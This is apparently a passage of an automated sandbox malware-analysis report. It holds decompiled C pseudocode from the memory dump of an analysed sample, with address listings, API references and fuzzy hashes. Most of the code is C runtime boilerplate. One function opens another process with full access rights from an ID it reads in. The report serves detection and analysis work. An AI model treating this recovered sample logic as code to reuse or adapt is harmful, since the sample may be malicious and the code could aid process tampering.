                                                                                      																			E00413149(_t82);
                                                                                      																			L53:
                                                                                      																			goto L54;
                                                                                      																		}
                                                                                      																	}
                                                                                      																}
                                                                                      															}
                                                                                      														}
                                                                                      													}
                                                                                      												}
                                                                                      											}
                                                                                      										}
                                                                                      									}
                                                                                      								}
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				L55:
                                                                                      				return E0041361E(_t54, _t82, _v8 ^ _t103, _t100, _t101, _t102);
                                                                                      			}

































                                                                                      0x0043068e
                                                                                      0x00430695
                                                                                      0x0043069b
                                                                                      0x0043069f
                                                                                      0x004306a6
                                                                                      0x004306a9
                                                                                      0x004306ac
                                                                                      0x004306af
                                                                                      0x004306b2
                                                                                      0x004306b8
                                                                                      0x004306cd
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004306ba
                                                                                      0x004306bc
                                                                                      0x004306c3
                                                                                      0x004306c6
                                                                                      0x004306d3
                                                                                      0x004306d3
                                                                                      0x004306d8
                                                                                      0x004306ed
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x004306da
                                                                                      0x004306e2
                                                                                      0x004306e5
                                                                                      0x004306f3
                                                                                      0x004306f3
                                                                                      0x004306f8
                                                                                      0x004306ff
                                                                                      0x00430702
                                                                                      0x00430702
                                                                                      0x00430707
                                                                                      0x00430713
                                                                                      0x0043091e
                                                                                      0x0043091e
                                                                                      0x00000000
                                                                                      0x00430719
                                                                                      0x0043071c
                                                                                      0x004307a8
                                                                                      0x004307aa
                                                                                      0x00430722
                                                                                      0x00430725
                                                                                      0x0043076d
                                                                                      0x0043076d
                                                                                      0x00000000
                                                                                      0x00430727
                                                                                      0x00430734
                                                                                      0x00000000
                                                                                      0x0043073a
                                                                                      0x0043073c
                                                                                      0x00430777
                                                                                      0x00000000
                                                                                      0x00430779
                                                                                      0x0043077d
                                                                                      0x00430783
                                                                                      0x00430786
                                                                                      0x00430788
                                                                                      0x0043078b
                                                                                      0x0043078b
                                                                                      0x00430790
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00430792
                                                                                      0x00430796
                                                                                      0x004307a0
                                                                                      0x004307a6
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00430796
                                                                                      0x0043078b
                                                                                      0x00430786
                                                                                      0x00000000
                                                                                      0x0043077d
                                                                                      0x0043073e
                                                                                      0x00430742
                                                                                      0x00430748
                                                                                      0x0043074b
                                                                                      0x0043074d
                                                                                      0x00430750
                                                                                      0x00430750
                                                                                      0x00430755
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00430757
                                                                                      0x0043075b
                                                                                      0x00430765
                                                                                      0x0043076b
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x00000000
                                                                                      0x0043075b
                                                                                      0x00430750
                                                                                      0x0043074b
                                                                                      0x00000000
                                                                                      0x0043076f
                                                                                      0x0043076f
                                                                                      0x0043076f
                                                                                      0x0043073c
                                                                                      0x00430734
                                                                                      0x00430725
                                                                                      0x0043071c
                                                                                      0x004307b0
                                                                                      0x004307b0
                                                                                      0x004307bb
                                                                                      0x004307c0
                                                                                      0x004307c3
                                                                                      0x004307c8
                                                                                      0x004308ce
                                                                                      0x004308ce
                                                                                      0x004307ce
                                                                                      0x004307d1
                                                                                      0x004307d6
                                                                                      0x004307d8
                                                                                      0x004307da
                                                                                      0x0043091a
                                                                                      0x0043091a
                                                                                      0x00000000
                                                                                      0x004307e0
                                                                                      0x004307e5
                                                                                      0x00430804
                                                                                      0x00430809
                                                                                      0x00000000
                                                                                      0x0043080f
                                                                                      0x0043080f
                                                                                      0x00000000
                                                                                      0x0043080f
                                                                                      0x004307e7
                                                                                      0x004307e7
                                                                                      0x004307ec
                                                                                      0x004307f0
                                                                                      0x00000000
                                                                                      0x004307f6
                                                                                      0x004307f6
                                                                                      0x00430815
                                                                                      0x00430815
                                                                                      0x0043081a
                                                                                      0x00000000
                                                                                      0x00430820
                                                                                      0x00430828
                                                                                      0x0043082e
                                                                                      0x00430833
                                                                                      0x00430838
                                                                                      0x00430912
                                                                                      0x00430912
                                                                                      0x00430913
                                                                                      0x00430913
                                                                                      0x00000000
                                                                                      0x0043083e
                                                                                      0x00430843
                                                                                      0x0043084a
                                                                                      0x0043084f
                                                                                      0x00430852
                                                                                      0x00430857
                                                                                      0x00000000
                                                                                      0x0043085d
                                                                                      0x00430860
                                                                                      0x00430865
                                                                                      0x00430867
                                                                                      0x00430869
                                                                                      0x0043090e
                                                                                      0x0043090e
                                                                                      0x00000000
                                                                                      0x0043086f
                                                                                      0x00430874
                                                                                      0x00430893
                                                                                      0x00430898
                                                                                      0x00000000
                                                                                      0x0043089a
                                                                                      0x0043089a
                                                                                      0x00000000
                                                                                      0x0043089a
                                                                                      0x00430876
                                                                                      0x00430876
                                                                                      0x0043087b
                                                                                      0x0043087f
                                                                                      0x00000000
                                                                                      0x00430885
                                                                                      0x00430885
                                                                                      0x004308a0
                                                                                      0x004308a0
                                                                                      0x004308a5
                                                                                      0x00000000
                                                                                      0x004308a7
                                                                                      0x004308be
                                                                                      0x004308f5
                                                                                      0x004308fb
                                                                                      0x004308fd
                                                                                      0x00430903
                                                                                      0x0043090a
                                                                                      0x004308c0
                                                                                      0x004308c0
                                                                                      0x004308c1
                                                                                      0x004308c1
                                                                                      0x004308c7
                                                                                      0x004308cd
                                                                                      0x00000000
                                                                                      0x004308cd
                                                                                      0x004308be
                                                                                      0x004308a5
                                                                                      0x0043087f
                                                                                      0x00430874
                                                                                      0x00430869
                                                                                      0x00430857
                                                                                      0x00430838
                                                                                      0x0043081a
                                                                                      0x004307f0
                                                                                      0x004307e5
                                                                                      0x004307da
                                                                                      0x004307c8
                                                                                      0x00430707
                                                                                      0x004306d8
                                                                                      0x004308d0
                                                                                      0x004308e1

                                                                                      APIs
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: __freea$Info
                                                                                      • String ID: P{
                                                                                      • API String ID: 541289543-680765652
                                                                                      • Opcode ID: f0f83a19e3cbc8ff498ab3090fd2b76892a57e84ede28cc000787adab1b18636
                                                                                      • Instruction ID: a13ec234aee0f392bb2bc3a7f28e20972502c33dd6403985fd9b332b5f3b83e5
                                                                                      • Opcode Fuzzy Hash: f0f83a19e3cbc8ff498ab3090fd2b76892a57e84ede28cc000787adab1b18636
                                                                                      • Instruction Fuzzy Hash: 78710672A002196BEF24AF658C61BAF77B59F4D314F24121BE814A7382D73CDD418BA9
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 63%
                                                                                      			E004148C0(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                      				char _v5;
                                                                                      				signed int _v12;
                                                                                      				char _v16;
                                                                                      				intOrPtr _v20;
                                                                                      				intOrPtr _v24;
                                                                                      				intOrPtr _v28;
                                                                                      				char _v32;
                                                                                      				char _t52;
                                                                                      				signed int _t59;
                                                                                      				intOrPtr _t60;
                                                                                      				void* _t61;
                                                                                      				intOrPtr* _t62;
                                                                                      				intOrPtr _t64;
                                                                                      				intOrPtr _t66;
                                                                                      				intOrPtr _t68;
                                                                                      				intOrPtr* _t72;
                                                                                      				intOrPtr _t73;
                                                                                      				signed int _t77;
                                                                                      				char _t79;
                                                                                      				intOrPtr _t89;
                                                                                      				intOrPtr _t92;
                                                                                      				intOrPtr* _t94;
                                                                                      				void* _t98;
                                                                                      				void* _t100;
                                                                                      				void* _t107;
                                                                                      
                                                                                      				_t85 = __edx;
                                                                                      				_t72 = _a4;
                                                                                      				_push(__edi);
                                                                                      				_v5 = 0;
                                                                                      				_v16 = 1;
                                                                                      				 *_t72 = E004312F7(__ecx,  *_t72);
                                                                                      				_t73 = _a8;
                                                                                      				_t6 = _t73 + 0x10; // 0x11
                                                                                      				_t92 = _t6;
                                                                                      				_push(_t92);
                                                                                      				_v20 = _t92;
                                                                                      				_v12 =  *(_t73 + 8) ^  *0x443048;
                                                                                      				E00414880(_t73, __edx, __edi, _t92,  *(_t73 + 8) ^  *0x443048);
                                                                                      				E0041789C(_a12);
                                                                                      				_t52 = _a4;
                                                                                      				_t100 = _t98 - 0x1c + 0x10;
                                                                                      				_t89 =  *((intOrPtr*)(_t73 + 0xc));
                                                                                      				if(( *(_t52 + 4) & 0x00000066) != 0) {
                                                                                      					__eflags = _t89 - 0xfffffffe;
                                                                                      					if(_t89 != 0xfffffffe) {
                                                                                      						_t85 = 0xfffffffe;
                                                                                      						E00417A20(_t73, 0xfffffffe, _t92, 0x443048);
                                                                                      						goto L13;
                                                                                      					}
                                                                                      					goto L14;
                                                                                      				} else {
                                                                                      					_v32 = _t52;
                                                                                      					_v28 = _a12;
                                                                                      					 *((intOrPtr*)(_t73 - 4)) =  &_v32;
                                                                                      					if(_t89 == 0xfffffffe) {
                                                                                      						L14:
                                                                                      						return _v16;
                                                                                      					} else {
                                                                                      						do {
                                                                                      							_t77 = _v12;
                                                                                      							_t59 = _t89 + (_t89 + 2) * 2;
                                                                                      							_t73 =  *((intOrPtr*)(_t77 + _t59 * 4));
                                                                                      							_t60 = _t77 + _t59 * 4;
                                                                                      							_t78 =  *((intOrPtr*)(_t60 + 4));
                                                                                      							_v24 = _t60;
                                                                                      							if( *((intOrPtr*)(_t60 + 4)) == 0) {
                                                                                      								_t79 = _v5;
                                                                                      								goto L7;
                                                                                      							} else {
                                                                                      								_t85 = _t92;
                                                                                      								_t61 = E004179C0(_t78, _t92);
                                                                                      								_t79 = 1;
                                                                                      								_v5 = 1;
                                                                                      								_t107 = _t61;
                                                                                      								if(_t107 < 0) {
                                                                                      									_v16 = 0;
                                                                                      									L13:
                                                                                      									_push(_t92);
                                                                                      									E00414880(_t73, _t85, _t89, _t92, _v12);
                                                                                      									goto L14;
                                                                                      								} else {
                                                                                      									if(_t107 > 0) {
                                                                                      										_t62 = _a4;
                                                                                      										__eflags =  *_t62 - 0xe06d7363;
                                                                                      										if( *_t62 == 0xe06d7363) {
                                                                                      											__eflags =  *0x4346b0;
                                                                                      											if(__eflags != 0) {
                                                                                      												_t68 = E00430D10(__eflags, 0x4346b0);
                                                                                      												_t100 = _t100 + 4;
                                                                                      												__eflags = _t68;
                                                                                      												if(_t68 != 0) {
                                                                                      													_t94 =  *0x4346b0; // 0x4146b3
                                                                                      													 *0x4331a4(_a4, 1);
                                                                                      													 *_t94();
                                                                                      													_t92 = _v20;
                                                                                      													_t100 = _t100 + 8;
                                                                                      												}
                                                                                      												_t62 = _a4;
                                                                                      											}
                                                                                      										}
                                                                                      										_t86 = _t62;
                                                                                      										E00417A00(_t62, _a8, _t62);
                                                                                      										_t64 = _a8;
                                                                                      										__eflags =  *((intOrPtr*)(_t64 + 0xc)) - _t89;
                                                                                      										if( *((intOrPtr*)(_t64 + 0xc)) != _t89) {
                                                                                      											_t86 = _t89;
                                                                                      											E00417A20(_t64, _t89, _t92, 0x443048);
                                                                                      											_t64 = _a8;
                                                                                      										}
                                                                                      										_push(_t92);
                                                                                      										 *((intOrPtr*)(_t64 + 0xc)) = _t73;
                                                                                      										E00414880(_t73, _t86, _t89, _t92, _v12);
                                                                                      										E004179E0();
                                                                                      										asm("int3");
                                                                                      										_t66 =  *0x4447d0; // 0x0
                                                                                      										return _t66;
                                                                                      									} else {
                                                                                      										goto L7;
                                                                                      									}
                                                                                      								}
                                                                                      							}
                                                                                      							goto L24;
                                                                                      							L7:
                                                                                      							_t89 = _t73;
                                                                                      						} while (_t73 != 0xfffffffe);
                                                                                      						if(_t79 != 0) {
                                                                                      							goto L13;
                                                                                      						}
                                                                                      						goto L14;
                                                                                      					}
                                                                                      				}
                                                                                      				L24:
                                                                                      			}




























                                                                                      0x004148c0
                                                                                      0x004148c7
                                                                                      0x004148cb
                                                                                      0x004148cc
                                                                                      0x004148d2
                                                                                      0x004148de
                                                                                      0x004148e0
                                                                                      0x004148e6
                                                                                      0x004148e6
                                                                                      0x004148ef
                                                                                      0x004148f1
                                                                                      0x004148f4
                                                                                      0x004148f7
                                                                                      0x004148ff
                                                                                      0x00414904
                                                                                      0x00414907
                                                                                      0x0041490a
                                                                                      0x00414911
                                                                                      0x0041496d
                                                                                      0x00414970
                                                                                      0x00414978
                                                                                      0x0041497f
                                                                                      0x00000000
                                                                                      0x0041497f
                                                                                      0x00000000
                                                                                      0x00414913
                                                                                      0x00414913
                                                                                      0x00414919
                                                                                      0x0041491f
                                                                                      0x00414925
                                                                                      0x00414990
                                                                                      0x00414999
                                                                                      0x00414927
                                                                                      0x00414927
                                                                                      0x00414927
                                                                                      0x0041492d
                                                                                      0x00414930
                                                                                      0x00414933
                                                                                      0x00414936
                                                                                      0x00414939
                                                                                      0x0041493e
                                                                                      0x00414954
                                                                                      0x00000000
                                                                                      0x00414940
                                                                                      0x00414940
                                                                                      0x00414942
                                                                                      0x00414947
                                                                                      0x00414949
                                                                                      0x0041494c
                                                                                      0x0041494e
                                                                                      0x00414964
                                                                                      0x00414984
                                                                                      0x00414984
                                                                                      0x00414988
                                                                                      0x00000000
                                                                                      0x00414950
                                                                                      0x00414950
                                                                                      0x0041499a
                                                                                      0x0041499d
                                                                                      0x004149a3
                                                                                      0x004149a5
                                                                                      0x004149ac
                                                                                      0x004149b3
                                                                                      0x004149b8
                                                                                      0x004149bb
                                                                                      0x004149bd
                                                                                      0x004149bf
                                                                                      0x004149cc
                                                                                      0x004149d2
                                                                                      0x004149d4
                                                                                      0x004149d7
                                                                                      0x004149d7
                                                                                      0x004149da
                                                                                      0x004149da
                                                                                      0x004149ac
                                                                                      0x004149e0
                                                                                      0x004149e2
                                                                                      0x004149e7
                                                                                      0x004149ea
                                                                                      0x004149ed
                                                                                      0x004149f5
                                                                                      0x004149f9
                                                                                      0x004149fe
                                                                                      0x004149fe
                                                                                      0x00414a01
                                                                                      0x00414a05
                                                                                      0x00414a08
                                                                                      0x00414a18
                                                                                      0x00414a1d
                                                                                      0x00414a1e
                                                                                      0x00414a24
                                                                                      0x00414952
                                                                                      0x00000000
                                                                                      0x00414952
                                                                                      0x00414950
                                                                                      0x0041494e
                                                                                      0x00000000
                                                                                      0x00414957
                                                                                      0x00414957
                                                                                      0x00414959
                                                                                      0x00414960
                                                                                      0x00000000
                                                                                      0x00414962
                                                                                      0x00000000
                                                                                      0x00414960
                                                                                      0x00414925
                                                                                      0x00000000

                                                                                      APIs
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 004148F7
                                                                                      • ___except_validate_context_record.LIBVCRUNTIME ref: 004148FF
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00414988
                                                                                      • __IsNonwritableInCurrentImage.LIBCMT ref: 004149B3
                                                                                      • _ValidateLocalCookies.LIBCMT ref: 00414A08
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 0000000B.00000002.604085544.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_11_2_400000_4113.jbxd
                                                                                      Similarity
                                                                                      • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                      • String ID: 0'@$csm
                                                                                      • API String ID: 1170836740-4075550888
                                                                                      • Opcode ID: 37ee35bdfcf69a5a67e8760e9b0949c12f64935090aec567b214218e131f2c08
                                                                                      • Instruction ID: 58811f3bd87834736161466f5a39b72313ca76df223ce2887cb75226c9d9a6a3
                                                                                      • Opcode Fuzzy Hash: 37ee35bdfcf69a5a67e8760e9b0949c12f64935090aec567b214218e131f2c08
                                                                                      • Instruction Fuzzy Hash: 3F411974A102099BCF10DF69C841ADFBFB5AF85328F14816BE8145B352D739EA85CB98
                                                                                      Uniqueness

                                                                                      Uniqueness Score: -1.00%

                                                                                      C-Code - Quality: 62%
                                                                                      			E00403E40(void* __ebx, void* __edx, void* __edi) {
                                                                                      				int _v8;
                                                                                      				char _v16;
                                                                                      				signed int _v20;
                                                                                      				intOrPtr _v24;
                                                                                      				int _v28;
                                                                                      				char _v44;
                                                                                      				int _v68;
                                                                                      				int _v72;
                                                                                      				int _v76;
                                                                                      				int _v108;
                                                                                      				char _v116;
                                                                                      				intOrPtr _v120;
                                                                                      				intOrPtr _v136;
                                                                                      				intOrPtr _v160;
                                                                                      				char _v212;
                                                                                      				char _v228;
                                                                                      				char _v229;
                                                                                      				int _v236;
                                                                                      				intOrPtr* _v240;
                                                                                      				char _v244;
                                                                                      				int _v264;
                                                                                      				char _v272;
                                                                                      				void* __esi;
                                                                                      				void* __ebp;
                                                                                      				signed int _t113;
                                                                                      				signed int _t114;
                                                                                      				long _t134;
                                                                                      				void* _t135;
                                                                                      				intOrPtr _t148;
                                                                                      				signed int _t154;
                                                                                      				signed int _t155;
                                                                                      				void* _t166;
                                                                                      				void* _t167;
                                                                                      				void* _t173;
                                                                                      				intOrPtr* _t177;
                                                                                      				void* _t184;
                                                                                      				intOrPtr _t186;
                                                                                      				intOrPtr* _t194;
                                                                                      				intOrPtr* _t200;
                                                                                      				intOrPtr* _t202;
                                                                                      				void* _t204;
                                                                                      				void* _t210;
                                                                                      				intOrPtr* _t211;
                                                                                      				void* _t215;
                                                                                      				void* _t216;
                                                                                      				intOrPtr* _t217;
                                                                                      				signed int _t219;
                                                                                      				void* _t221;
                                                                                      				signed int _t223;
                                                                                      
                                                                                      				_t210 = __edi;
                                                                                      				_t204 = __edx;
                                                                                      				_t179 = __ebx;
                                                                                      				_push(0xffffffff);
                                                                                      				_push(0x431788);
                                                                                      				_push( *[fs:0x0]);
                                                                                      				_t113 =  *0x443048; // 0x9900ec21
                                                                                      				_t114 = _t113 ^ _t219;
                                                                                      				_v20 = _t114;
                                                                                      				_push(_t114);
                                                                                      				 *[fs:0x0] =  &_v16;
                                                                                      				_v236 = 0;
                                                                                      				E00415180(__edi,  &_v228, 0, 0xb8);
                                                                                      				_v228 = 0x43ea7c;
                                                                                      				_t215 =  >=  ?  *0x443aa4 : 0x443aa4;
                                                                                      				_v108 = 0;
                                                                                      				_v76 = 0;
                                                                                      				_v72 = 0;
                                                                                      				_v68 = 0;
                                                                                      				_t223 = _t221 - 0xe4 + 8;
                                                                                      				_v8 = 0;
                                                                                      				_v236 = 1;
                                                                                      				asm("xorps xmm0, xmm0");
                                                                                      				_v116 = 0x43ea88;
                                                                                      				_v120 = 0x58;
                                                                                      				asm("movlpd [ebp-0xd8], xmm0");
                                                                                      				E00407F70( &_v116, _t204,  *0x443ab8 - 0x10,  &_v212);
                                                                                      				_v8 = 2;
                                                                                      				_t17 =  &_v228; // 0x43ea7c
                                                                                      				 *((intOrPtr*)(_t219 +  *((intOrPtr*)( *_t17 + 4)) - 0xe0)) = 0x43ea90;
                                                                                      				_t22 = _v228 + 4; // 0x43f75c
                                                                                      				_t23 =  *_t22 - 0x70; // 0x43f6ec
                                                                                      				 *((intOrPtr*)(_t219 +  *_t22 - 0xe4)) = _t23;
                                                                                      				E00407040( &_v212,  *0x443ab8 - 0x10);
                                                                                      				_v8 = 3;
                                                                                      				if(_v136 != 0) {
                                                                                      					L5:
                                                                                      					_t41 = _v228 + 4; // 0x43f75c
                                                                                      					_t184 =  &_v228 +  *_t41;
                                                                                      					__eflags =  *(_t184 + 0x38);
                                                                                      					_t47 = _t184 + 0xc; // 0x443ffc
                                                                                      					__eflags = 0x00000002 + ( *(_t184 + 0x38) == 0x00000000) * 0x00000004 |  *_t47;
                                                                                      					E00403A00(_t179, _t184, 0x00000002 + ( *(_t184 + 0x38) == 0x00000000) * 0x00000004 |  *_t47, 0);
                                                                                      				} else {
                                                                                      					_push(0x40);
                                                                                      					_push(1);
                                                                                      					_t167 = E00412A0C(_t204, 0x443aa4);
                                                                                      					_t223 = _t223 + 0xc;
                                                                                      					if(_t167 == 0) {
                                                                                      						goto L5;
                                                                                      					} else {
                                                                                      						E00406E40( &_v212, _t167, 1);
                                                                                      						_t200 =  *((intOrPtr*)(_v160 + 4));
                                                                                      						_v240 = _t200;
                                                                                      						 *((intOrPtr*)( *_t200 + 4))();
                                                                                      						_v8 = 4;
                                                                                      						_push( &_v244);
                                                                                      						_t173 = E00408400(__ebx, _t204, _t210, _t215);
                                                                                      						_t223 = _t223 + 4;
                                                                                      						E00406CE0( &_v212, _t173);
                                                                                      						_t202 = _v240;
                                                                                      						if(_t202 != 0) {
                                                                                      							_t177 =  *((intOrPtr*)( *((intOrPtr*)( *_t202 + 8))))();
                                                                                      							if(_t177 != 0) {
                                                                                      								 *((intOrPtr*)( *_t177))(1);
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				}
                                                                                      				_v8 = 5;
                                                                                      				if(_v136 != 0) {
                                                                                      					asm("xorps xmm0, xmm0");
                                                                                      					_v28 = 0;
                                                                                      					asm("movups [ebp-0x28], xmm0");
                                                                                      					_v24 = 0xf;
                                                                                      					_v44 = 0;
                                                                                      					_v8 = 6;
                                                                                      					L00408360(_t179,  &_v228,  &_v44);
                                                                                      					__eflags = _v24 - 0x10;
                                                                                      					_t133 =  >=  ? _v44 :  &_v44;
                                                                                      					_t134 = E0041B520( &_v44, _t210,  >=  ? _v44 :  &_v44);
                                                                                      					_t223 = _t223 + 4;
                                                                                      					_t135 = OpenProcess(0x1fffff, 0, _t134);
                                                                                      					__eflags = _t135;
                                                                                      					_v8 = 5;
                                                                                      					_t186 = _v24;
                                                                                      					_v229 = _t135 != 0;
                                                                                      					__eflags = _t186 - 0x10;
                                                                                      					if(_t186 < 0x10) {
                                                                                      						L12:
                                                                                      						_v28 = 0;
                                                                                      						_v24 = 0xf;
                                                                                      						_v44 = 0;
                                                                                      						goto L13;
                                                                                      					} else {
                                                                                      						_t207 = _v44;
                                                                                      						_t194 = _t186 + 1;
                                                                                      						_t148 = _v44;
                                                                                      						__eflags = _t194 - 0x1000;
                                                                                      						if(_t194 < 0x1000) {
                                                                                      							L11:
                                                                                      							_push(_t194);
                                                                                      							E004138AD(_t207);
                                                                                      							_t223 = _t223 + 8;
                                                                                      							goto L12;
                                                                                      						} else {
                                                                                      							_t207 =  *((intOrPtr*)(_t148 - 4));
                                                                                      							_t194 = _t194 + 0x23;
                                                                                      							__eflags = _t148 - _t207 + 0xfffffffc - 0x1f;
                                                                                      							if(_t148 - _t207 + 0xfffffffc > 0x1f) {
                                                                                      								E0041805F(_t179, _t194, _t207);
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								asm("int3");
                                                                                      								_push(_t219);
                                                                                      								_push(0xffffffff);
                                                                                      								_push(0x431710);
                                                                                      								_push( *[fs:0x0]);
                                                                                      								_push(_t215);
                                                                                      								_push(_t210);
                                                                                      								_t154 =  *0x443048; // 0x9900ec21
                                                                                      								_t155 = _t154 ^ _t223;
                                                                                      								__eflags = _t155;
                                                                                      								_push(_t155);
                                                                                      								 *[fs:0x0] =  &_v272;
                                                                                      								_t217 = _t194;
                                                                                      								_t211 = _t217 + 0x70;
                                                                                      								_t95 = _t211 - 0x60; // 0x43ea28
                                                                                      								 *((intOrPtr*)( *((intOrPtr*)( *_t217 + 4)) + _t211 - 0x70)) = 0x43ea90;
                                                                                      								_t100 =  *((intOrPtr*)( *_t217 + 4)) - 0x70; // -107
                                                                                      								 *((intOrPtr*)( *((intOrPtr*)( *_t217 + 4)) + _t211 - 0x74)) = _t100;
                                                                                      								E00405690(_t95);
                                                                                      								 *((intOrPtr*)( *((intOrPtr*)( *_t217 + 4)) + _t211 - 0x70)) = 0x43ea88;
                                                                                      								_t107 =  *((intOrPtr*)( *_t217 + 4)) - 0x18; // -19
                                                                                      								 *((intOrPtr*)( *((intOrPtr*)( *_t217 + 4)) + _t211 - 0x74)) = _t107;
                                                                                      								_v264 = 0;
                                                                                      								 *_t211 = 0x43ea28;
                                                                                      								_t166 = E004128AD(_t211);
                                                                                      								 *[fs:0x0] = _v272;
                                                                                      								return _t166;
                                                                                      							} else {
                                                                                      								goto L11;
                                                                                      							}
                                                                                      						}
                                                                                      					}
                                                                                      				} else {
                                                                                      					_v229 = 0;
                                                                                      					L13:
                                                                                      					_t69 = _v228 + 4; // 0x43f75c
                                                                                      					 *((intOrPtr*)(_t219 +  *_t69 - 0xe0)) = 0x43ea90;
                                                                                      					_t73 = _v228 + 4; // 0x43f75c
                                                                                      					_t74 =  *_t73 - 0x70; // 0x43f6ec
                                                                                      					 *((intOrPtr*)(_t219 +  *_t73 - 0xe4)) = _t74;
                                                                                      					E00405690( &_v212);
                                                                                      					_t79 = _v228 + 4; // 0x43f75c
                                                                                      					 *((intOrPtr*)(_t219 +  *_t79 - 0xe0)) = 0x43ea88;
                                                                                      					_t83 = _v228 + 4; // 0x43fa70
                                                                                      					_t84 =  *_t83 - 0x18; // 0x43fa58
                                                                                      					 *((intOrPtr*)(_t219 +  *_t83 - 0xe4)) = _t84;
                                                                                      					_v8 = 7;
                                                                                      					_v116 = 0x43ea28;
                                                                                      					E004128AD( &_v116);
                                                                                      					 *[fs:0x0] = _v16;
                                                                                      					_pop(_t216);
                                                                                      					return E0041361E(_v229, _t179, _v20 ^ _t219,  *_t83, _t210, _t216);
                                                                                      				}
                                                                                      			}




















































                                                                                      0x00403e40
                                                                                      0x00403e40
                                                                                      0x00403e40
                                                                                      0x00403e43
                                                                                      0x00403e45
                                                                                      0x00403e50
                                                                                      0x00403e57
                                                                                      0x00403e5c
                                                                                      0x00403e5e
                                                                                      0x00403e62
                                                                                      0x00403e66
                                                                                      0x00403e77
                                                                                      0x00403e84
                                                                                      0x00403e95
                                                                                      0x00403e9f
                                                                                      0x00403ea6
                                                                                      0x00403ead
                                                                                      0x00403eb4
                                                                                      0x00403ebb
                                                                                      0x00403ec2
                                                                                      0x00403ec5
                                                                                      0x00403ed2
                                                                                      0x00403edc
                                                                                      0x00403edf
                                                                                      0x00403ee9
                                                                                      0x00403ef1
                                                                                      0x00403ef9
                                                                                      0x00403efe
                                                                                      0x00403f05
                                                                                      0x00403f0e
                                                                                      0x00403f1f
                                                                                      0x00403f22
                                                                                      0x00403f25
                                                                                      0x00403f32
                                                                                      0x00403f37
                                                                                      0x00403f42
                                                                                      0x00403fb5
                                                                                      0x00403fc3
                                                                                      0x00403fc3
                                                                                      0x00403fc8
                                                                                      0x00403fd5
                                                                                      0x00403fd5
                                                                                      0x00403fd9
                                                                                      0x00403f44
                                                                                      0x00403f44
                                                                                      0x00403f46
                                                                                      0x00403f49
                                                                                      0x00403f4e
                                                                                      0x00403f53
                                                                                      0x00000000
                                                                                      0x00403f55
                                                                                      0x00403f5e
                                                                                      0x00403f69
                                                                                      0x00403f6c
                                                                                      0x00403f74
                                                                                      0x00403f7d
                                                                                      0x00403f81
                                                                                      0x00403f82
                                                                                      0x00403f87
                                                                                      0x00403f91
                                                                                      0x00403f96
                                                                                      0x00403f9e
                                                                                      0x00403fa5
                                                                                      0x00403fa9
                                                                                      0x00403fb1
                                                                                      0x00403fb1
                                                                                      0x00403fa9
                                                                                      0x00403f9e
                                                                                      0x00403f53
                                                                                      0x00403fde
                                                                                      0x00403fec
                                                                                      0x00403ffa
                                                                                      0x00403ffd
                                                                                      0x00404004
                                                                                      0x00404008
                                                                                      0x0040400f
                                                                                      0x00404016
                                                                                      0x00404020
                                                                                      0x00404025
                                                                                      0x0040402c
                                                                                      0x00404031
                                                                                      0x00404036
                                                                                      0x00404041
                                                                                      0x00404047
                                                                                      0x00404049
                                                                                      0x0040404d
                                                                                      0x00404050
                                                                                      0x00404057
                                                                                      0x0040405a
                                                                                      0x00404088
                                                                                      0x00404088
                                                                                      0x0040408f
                                                                                      0x00404096
                                                                                      0x00000000
                                                                                      0x0040405c
                                                                                      0x0040405c
                                                                                      0x0040405f
                                                                                      0x00404060
                                                                                      0x00404062
                                                                                      0x00404068
                                                                                      0x0040407e
                                                                                      0x0040407e
                                                                                      0x00404080
                                                                                      0x00404085
                                                                                      0x00000000
                                                                                      0x0040406a
                                                                                      0x0040406a
                                                                                      0x0040406d
                                                                                      0x00404075
                                                                                      0x00404078
                                                                                      0x0040412d
                                                                                      0x00404132
                                                                                      0x00404133
                                                                                      0x00404134
                                                                                      0x00404135
                                                                                      0x00404136
                                                                                      0x00404137
                                                                                      0x00404138
                                                                                      0x00404139
                                                                                      0x0040413a
                                                                                      0x0040413b
                                                                                      0x0040413c
                                                                                      0x0040413d
                                                                                      0x0040413e
                                                                                      0x0040413f
                                                                                      0x00404140
                                                                                      0x00404143
                                                                                      0x00404145
                                                                                      0x00404150
                                                                                      0x00404151
                                                                                      0x00404152
                                                                                      0x00404153
                                                                                      0x00404158
                                                                                      0x00404158
                                                                                      0x0040415a
                                                                                      0x0040415e
                                                                                      0x00404164
                                                                                      0x00404168
                                                                                      0x0040416b
                                                                                      0x00404171
                                                                                      0x0040417e
                                                                                      0x00404181
